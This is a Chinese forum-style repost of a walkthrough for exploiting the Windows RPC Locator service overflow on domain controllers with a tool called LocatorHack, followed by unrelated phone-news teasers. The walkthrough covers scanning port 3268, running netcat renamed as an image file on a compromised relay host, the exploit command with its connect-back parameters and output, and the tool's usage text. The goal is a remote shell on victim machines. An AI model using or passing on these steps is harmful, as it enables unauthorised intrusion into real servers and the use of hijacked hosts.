您的位置 首页 趣闻

rpc漏洞的利用

,rpc漏洞的利用

sunx出的那个程序成功率还不错 
没用过的去sunx.org下载吧 
简要说一下用法(给没用过的看的) 
首先拿superscan去扫3268端口,因为这是域控制器的标志 
这个漏洞只对域控制器有效 
扫到这样的机器以后,用nc在本地监听一个端口 
我是内网,只好在肉鸡上监听了 
下面是在肉鸡上~nn.jpg就是我放上去的nc 
218.0.0.0代表目标机 
123.123.123.123 代表开nc监听的肉鸡 
-------------- 
D:\WINNT\system32>nn.jpg -l -p 1111 
nn.jpg -l -p 1111 
---------------~~ 
然后在本地(ip不能说啊)参数大家自己查吧 
--------------- 
C:\>LocatorHack -h 218.0.0.0 -v 2 -l 2 -s 3 -r 123.123.123.123 -p 1111 
MsRpcLocator formQueryPacket.wcscpy overflow. writen by sunx 
http://www.sunx.org 
for test only, dont used to hack,  

connect socket.... 
connect smb... 
open namedpipe... 
bind rpc... 
call rpc... 
Overflowed, 218.0.0.0:1111 ------???是不是弄错? 
good luck  
------------------ 
这时候肉鸡上就出现了对方的system32目录 
usage: LocatorHack <-h Host> <-v OSVer> <-l OSLanguage> <-s OSSP> <-r connectback host> <-p connectback port> 

OS Version: 
winnt: 1 
win2k: 2 
winxp: 3 
OS Language: 
english: 1 
chinese: 2 
japanese: 3 


Exp: LocatorHack -h 192.168.0.1 -v 3 -l 1 -s 0 -r 127.0.0.1 -p 99 

-h 目标主机 
-v OS Version 2000就选2 
-l OS Language 按照上面的选择 
-s 选择所打的补丁 
-r 开nc的主机,可以是你自己也可以放在肉鸡上 
-p 用nc开的端口 
Locator Service是指向网络特有的名称映射逻辑名称的服务。此次就是在Locator Service中发现安全漏洞的。 Locator Service被捆绑于Window NT 4.0、Windows 2000和Windows XP中。不过,只有被设置成主域控制器的Windows NT 4.0和2000中,在默认条件下Locator Service才是有效的。没有设置成主域控制器的Windows NT/2000及XP则是无效的。 用superscan扫3268吧,很快就能扫到. 

免责声明:文章内容不代表本站立场,本站不对其内容的真实性、完整性、准确性给予任何担保、暗示和承诺,仅供读者参考,文章版权归原作者所有。如本文内容影响到您的合法权益(内容、图片等),请及时联系本站,我们会及时删除处理。

作者: dawei

【声明】:第七手机网内容转载自互联网,其相关言论仅代表作者个人观点绝非权威,不代表本站立场。如您发现内容存在版权问题,请提交相关链接至邮箱:bqsm@foxmail.com,我们将及时予以处理。

为您推荐

敢为天下后,OPPO Find N折叠屏的底气何在?

聊起OPPO,给我的第一印象就是本分,而在刚刚发布的OPPO Find N折叠屏手机上,我看到的是OPPO敢为天下后的底气。 当大家还沉浸在前一天发布的马里亚纳MariSilicon X影像NPU芯片时,OPPO又在12月15日推出了旗下首款折叠屏手机产品OPPO Find N。这是一款传闻已

OPPO Find N展开一刻,两大创新技术打破折痕路上意难平

荣耀发布了荣耀60系列的新品,特别是荣耀60 Pro的5000万像素超感知AI前置镜头和1亿像素超清后置主摄,是生活和游玩记录的好帮手。多镜录像功能在荣耀50系列上就已开始引入,在荣耀60系列上还新增了AI手势识别,Vlog隔空换镜这一创新功能,对拍摄Vlog来说相当

深扒天玑9000,发冲高关键年产品底气怎样?

联发科的天玑9000自公布以来,以过硬的技术实力迅速冲上了包括微博热搜在内的各类话题平台,吹响了冲击旗舰的号角。手机芯片进入4nm时代,arm推出面向未来十年的v9架构,5G技术R16即将商用,内存技术在升级面对全产业大跃进之势,联发科的天玑也迎来了上升的

想拍更远?汇总今年搭载潜望式长焦摄像头的手机

部分手机摄影发烧友已不再满足普通的2x长焦摄像头,他们需要拍的更远,画质也不能妥协,于是能拍更远的潜望式长焦摄像头就应运而生了。不过当镜头焦距上去了,后置镜头模组的厚度就难以控制,如果强行塞下更长焦段的镜头,模组厚度将达到1~2cm,这样的手机估

像素并非越高越好,为何5000万像素手机镜头倍受青欢迎

500万、800万、1200万像素,智能手机摄像头像素在早年发展的步伐相对还是比较缓慢,近来2000万、4800万、6400万、1.08亿像素接踵而来,手机摄像头的像素规格呈现出十分迅猛的迭代更新速度。然而在2019年首推量产1.08亿像素的智能手机后,至今手机上单颗传感

返回顶部